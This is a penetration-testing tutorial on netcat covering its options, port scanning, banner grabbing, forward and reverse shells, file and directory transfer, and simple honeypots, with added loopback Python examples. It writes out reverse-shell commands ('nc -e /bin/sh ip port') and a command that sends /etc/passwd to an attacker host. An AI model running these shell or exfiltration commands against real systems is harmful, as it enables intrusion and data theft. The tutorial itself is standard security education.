netcat | The TCP/IP Swiss Army knife

I have been doing penetration testing for several years, and in the course of projects I have found that good technique matters, but to get more out of a test you cannot do without powerful tools. Even someone extremely skilled cannot, I think, do a penetration test entirely by hand; after all, penetration testing is still largely manual labor.
Some people now think penetration testing is getting easier, because open-source automation tools keep appearing and the wheels keep being upgraded. Even someone who knows nothing about security can run a tool and turn up a pile of vulnerabilities, sometimes even obtain access automatically. I have to admit that today's automated tools have lowered the entry barrier of this field, but that does not mean penetration testing is becoming easier.
First, my reasoning is that security is a long game and the technology never stands still: security technology always runs ahead of security tools, so relying only on tools sometimes makes a penetration test hard to carry out, because defensive measures keep being updated while the attack side can only lean on tools that lag behind, and the results show it. Second, the powerful penetration tools on the market require a certain foundation to use; they are not point-and-click, and using a good tool well is not easy. In short, I personally think penetration testing will only get harder, and as domestic enterprises pay more attention to security, the burden on practitioners' shoulders will only get heavier.
All this preamble is just to introduce the theme of this series: penetration tools. The reason I want to document the tools I use in penetration tests is simply that a workman who wants to do a good job must first sharpen his tools, nothing more.
This article, the first in the series, introduces an enduring penetration tool, the one known as the Swiss Army knife: nc. Most of the content comes from the Internet, so readers who already know the older material can skip it. I try to record every aspect of using nc, mainly for my own reference, so criticism is welcome.

Introduction to Netcat

nc, full name netcat, is the Swiss Army knife of network tools: it reads and writes data across the network over TCP and UDP, and it is very powerful.

Netcat Installation

Linux and macOS normally ship with nc; run nc -h on the command line to check. On Windows, download the nc.exe tool.
Note that several different netcat implementations exist (the original "Hobbit" netcat and its Windows port, the OpenBSD version that most Linux distributions ship as nc, GNU netcat, and Nmap's ncat), and the option sets differ. In particular, -e (execute a program on connect) and -L (keep listening after a connection closes) come from the original version and its Windows port and are absent from the OpenBSD nc, so check nc -h on the machine you are actually on before relying on the commands below.

Netcat Usage

Basic usage

Run nc -h to view the help. The options below are those of the original netcat (and its Windows port); other versions differ:

-h          show this help
-d          detach from the console and run in the background (Windows)
-e prog     execute prog when a connection is made, wiring its stdin/stdout to the socket [dangerous]
-g gateway  source-routing hop point(s), up to 8
-G num      source-routing pointer: 4, 8, 12, ...
-i secs     delay interval for lines sent and ports scanned
-l          listen mode, for inbound connections
-L          listen "harder": keep listening after the connection closes, until Ctrl+C (Windows version)
-n          numeric-only IP addresses, no DNS (do not resolve names or reverse-resolve addresses)
-o file     write a hex dump of the traffic to file
-p port     local port number
-r          randomize local and remote ports
-s addr     local source address
-t          answer Telnet negotiation
-u          UDP mode
-v          verbose output; -vv is more verbose
-w secs     timeout for connects and final network reads
-z          zero-I/O mode, used for scanning

PortScan (port scan)

Basic TCP connect scan (nc completes the handshake and reports whether the port is open; without -z it also stays connected, so any banner the service sends is printed):

nc -vv ip port
Example: nc -vv victim_ip 5000



Set a timeout and scan a port range (-w is the connect timeout, so each filtered port costs up to that many seconds; add -z for a pure scan that sends no data):

nc -vv -w secs ip port-port
Example: nc -vv -w 5 victim_ip 5000-5002
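What those two commands do at the socket level, as an added example (mine, not from the original post): a TCP connect scan with a per-port timeout, and a banner grab of the kind -vv shows when a service greets you. It runs entirely over loopback against a constructed listener; host names, the banner text and the function names are assumptions for the demo.

```python
import socket
import threading


def tcp_connect_scan(host, ports, timeout=2.0):
    """Connect scan of `ports`, as `nc -z -w <timeout> host lo-hi` does.

    Returns the ports that completed the TCP handshake. A closed port refuses
    immediately; a filtered port only times out, so `timeout` bounds the
    worst-case time spent per port.
    """
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
            except OSError:          # ConnectionRefusedError, TimeoutError, ...
                continue
            open_ports.append(port)
    return open_ports


def grab_banner(host, port, timeout=2.0, nbytes=256):
    """Connect and read whatever the service volunteers first (what `nc -vv host
    port` prints for a chatty service). Returns b'' if the service stays silent."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        try:
            return s.recv(nbytes)
        except socket.timeout:
            return b""


def start_banner_listener(banner, host="127.0.0.1"):
    """Constructed stand-in for a target service: listens on a free port, greets
    each client with `banner`, then closes. Returns the bound port number."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    # Constructed banner; any string a real daemon might send would do.
    port = start_banner_listener(b"SSH-2.0-OpenSSH_9.6\r\n")
    print("open:", tcp_connect_scan("127.0.0.1", range(port - 1, port + 2)))
    print("banner:", grab_banner("127.0.0.1", port))
```

The scan is sequential on purpose: that is also how nc walks a range, and it is the reason a range with many filtered ports is slow unless -w is small.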



Establish connection

Forward connection

The target listens on a port and hands a shell to whoever connects:

nc -l -p port -e cmd.exe //windows
nc -l -p port -e /bin/sh //linux



The attacker's machine connects to that port:

nc ip port



Reverse connection

The attacker's machine listens on a local port (this is the usual choice when the target sits behind NAT or a firewall that blocks inbound connections but allows outbound ones):

nc -vv -l -p port



The target connects back to that port and hands it a shell:

nc -e cmd.exe ip port // windows
nc -e /bin/sh ip port // linux

Remember that -e only exists in the original netcat and its Windows port; the OpenBSD nc found on most Linux systems has no such option, which is also why -e is marked dangerous in the help: anything that can reach the listening port gets the shell.



Transfer files

Download a file from the target machine

victim machine:
nc attack_ip port < /etc/passwd
attacker machine:
nc -d -l -p port > tmp

Start the listening side first. nc prints no completion message, so compare the size or a hash of the file on both ends afterwards; on versions that do not close the connection when input is exhausted, end the sender with Ctrl+C (some versions offer -N or -q for this).



In this walkthrough the local machine plays the target, since it is the one with the network IP, and the scenario being simulated is downloading a file from the target to the attack machine.
Target machine: nc.exe attack_ip 9999 < H:\test.txt sends test.txt from the target's H: drive to port 9999 on the attack machine.
Attack machine: nc.exe -d -l -p 9999 > test.txt writes whatever arrives on local port 9999 to test.txt.

Upload a file to the target machine

attacker machine:
nc -d -l -p port < tmp
victim machine:
nc attack_ip port > tmp



Attacker: nc -d -l -p 9990 < test2.txt
Target machine: nc attack_ip 9990 > test2.txt

Capturing traffic (hex dump)

nc -vv -w 2 -o test.txt victim_ip 80 21-15

This connects to port 80 and to ports 21-15 on the target with a 2-second timeout and records a hex dump of everything sent and received in test.txt, which is handy for keeping a record of banners and raw protocol exchanges.



Combined with other commands through pipes and redirection, nc's capabilities expand considerably.
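An added example (mine, not from the original post) covering the two preceding sections together: a raw TCP file transfer like `nc -l -p port > file` / `nc host port < file`, with the integrity check nc itself never gives you (SHA-256 on both ends), plus a hex dump of the bytes that crossed the wire in the spirit of -o. It runs over loopback; the function names, the sample file contents and the dump layout are mine, not nc's exact -o format.

```python
import hashlib
import socket
import threading


def receive_to_file(path, host="127.0.0.1"):
    """Receiving side of `nc -l -p <port> > file`: listen on a free port and,
    in a thread, write everything that arrives to `path` until the peer closes.
    Returns (port, thread, result); result gets 'bytes' and 'sha256' filled in."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    result = {}

    def run():
        conn, _ = srv.accept()
        srv.close()
        h, n = hashlib.sha256(), 0
        with conn, open(path, "wb") as f:
            while True:
                chunk = conn.recv(65536)
                if not chunk:          # peer shut down its sending side: EOF
                    break
                f.write(chunk)
                h.update(chunk)
                n += len(chunk)
        result["bytes"], result["sha256"] = n, h.hexdigest()

    t = threading.Thread(target=run)
    t.start()
    return port, t, result


def send_file(host, port, path, dump=None):
    """Sending side of `nc host port < file`: stream the file, shut down the
    write side so the receiver sees EOF, and return the SHA-256 of what was
    sent. If `dump` is a list, hex-dump lines for each chunk are appended to it
    (offsets are within the chunk), the way `-o file` records traffic."""
    h = hashlib.sha256()
    with socket.create_connection((host, port)) as s, open(path, "rb") as f:
        while True:
            chunk = f.read(65536)
            if not chunk:
                break
            s.sendall(chunk)
            h.update(chunk)
            if dump is not None:
                dump.extend(hexdump(chunk, direction=">"))
        s.shutdown(socket.SHUT_WR)
    return h.hexdigest()


def hexdump(data, direction="<", width=16):
    """Render bytes as offset / hex / ASCII lines, prefixed '>' for sent and
    '<' for received. Layout is this example's, modelled on nc's -o output."""
    lines = []
    for off in range(0, len(data), width):
        row = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in row)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in row)
        lines.append(f"{direction} {off:08x} {hexpart:<{width * 3 - 1}} # {text}")
    return lines


def transfer(src, dst):
    """Move `src` to `dst` over loopback; return (hashes_match, bytes, dump)."""
    port, t, result = receive_to_file(dst)
    dump = []
    sent = send_file("127.0.0.1", port, src, dump=dump)
    t.join()
    return sent == result["sha256"], result["bytes"], dump


if __name__ == "__main__":
    import os, tempfile
    d = tempfile.mkdtemp()
    src, dst = os.path.join(d, "src.bin"), os.path.join(d, "dst.bin")
    with open(src, "wb") as f:                      # constructed sample file
        f.write(b"root:x:0:0:root:/root:/bin/bash\n" * 4)
    ok, n, dump = transfer(src, dst)
    print(ok, n)
    print("\n".join(dump[:3]))
```

The shutdown(SHUT_WR) is the part nc versions differ on: without it the receiver never sees EOF and the listener sits there forever, which is exactly the case where you end up pressing Ctrl+C.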

Encrypted transmission of data

Receiving side (connects and decrypts): $ nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt
Sending side (encrypts and listens): $ mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567

Treat this as a demonstration of piping rather than a recommendation: ECB mode leaks the structure of the plaintext, this pipeline provides no integrity protection, and mcrypt is no longer maintained. For a real transfer use an authenticated encryption tool or tunnel the connection over SSH.

Directory transfer

Target machine: $ tar -cvf - dir_name | nc -l 1567
Attacker: $ nc -n victim_ip 1567 | tar -xvf -

Running a prepared command script

Feed a file of commands into a connected shell (for example one opened with -e above); the output comes back over the same connection:

nc -vv victim_ip port < path\file.cmd



Building a simple honeypot (Windows nc, since -L is its "listen harder" option)

  • nc -L -p 80 as honeypot 1: open port 80 and keep listening on it, accepting connection after connection, until Ctrl+C
  • nc -L -p 80 > c:\log.txt as honeypot 2: open port 80 and keep listening until Ctrl+C, writing everything received to c:\log.txt
  • nc -L -p 80 < c:\honeyport.txt as honeypot 3-1: open port 80 and keep listening until Ctrl+C, feeding the contents of c:\honeyport.txt to each client (this doubles as a way of delivering a file)
  • type c:\honeyport.txt | nc -L -p 80 as honeypot 3-2: the same as 3-1, with the contents of c:\honeyport.txt piped in instead of redirected
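An added example (mine, not from the original post) of what the -L honeypot variants amount to: a listener that keeps re-accepting connections, answers each with a canned banner (the honeyport.txt contents) and writes one log line per connection with time, peer address and the first bytes the visitor sent, which is the detail a log like c:\log.txt is wanted for. It binds loopback on a free port; a real honeypot would bind 80 or 21. The banner text, the probe payloads and the function names are constructed for the demo.

```python
import socket
import threading
import time


def start_honeypot(logfile, banner=b"", host="127.0.0.1", port=0):
    """Persistent listener in the spirit of `nc -L -p 80 > c:\\log.txt`: accept
    connections until stop() is called, send `banner` to each client, and
    append one line per connection to `logfile`. port=0 picks a free port.
    Returns (bound_port, stop)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(16)
    bound = srv.getsockname()[1]
    stop_flag = threading.Event()
    log_lock = threading.Lock()
    handlers = []

    def handle(conn, peer):
        with conn:
            conn.settimeout(3.0)
            if banner:
                conn.sendall(banner)
            try:
                first = conn.recv(1024)   # enough to see a request line or a login
            except OSError:
                first = b""
        line = "%s %s:%d %r\n" % (time.strftime("%Y-%m-%dT%H:%M:%S"),
                                  peer[0], peer[1], first)
        with log_lock, open(logfile, "a") as f:
            f.write(line)

    def loop():
        srv.settimeout(0.5)               # wake periodically to check stop_flag
        while not stop_flag.is_set():
            try:
                conn, peer = srv.accept()
            except socket.timeout:
                continue
            t = threading.Thread(target=handle, args=(conn, peer))
            t.start()
            handlers.append(t)
        srv.close()

    acceptor = threading.Thread(target=loop, daemon=True)
    acceptor.start()

    def stop():
        stop_flag.set()
        acceptor.join()
        for t in handlers:                # make sure every log line is written
            t.join()

    return bound, stop


def probe(host, port, payload):
    """Constructed client standing in for a scanner or bot: connect, send
    `payload`, return whatever the honeypot answered."""
    with socket.create_connection((host, port)) as s:
        s.settimeout(3.0)
        s.sendall(payload)
        try:
            return s.recv(1024)
        except socket.timeout:
            return b""


def read_log(logfile):
    """Return the honeypot's log lines."""
    with open(logfile) as f:
        return f.read().splitlines()


if __name__ == "__main__":
    import os, tempfile
    log = os.path.join(tempfile.mkdtemp(), "log.txt")
    port, stop = start_honeypot(log, banner=b"220 ftp ready\r\n")
    print(probe("127.0.0.1", port, b"USER anonymous\r\n"))
    stop()
    print("\n".join(read_log(log)))
```

Unlike the one-liner, this records the peer address and keeps serving while a client is being handled, which is what distinguishes a log worth reading from a file of undifferentiated bytes.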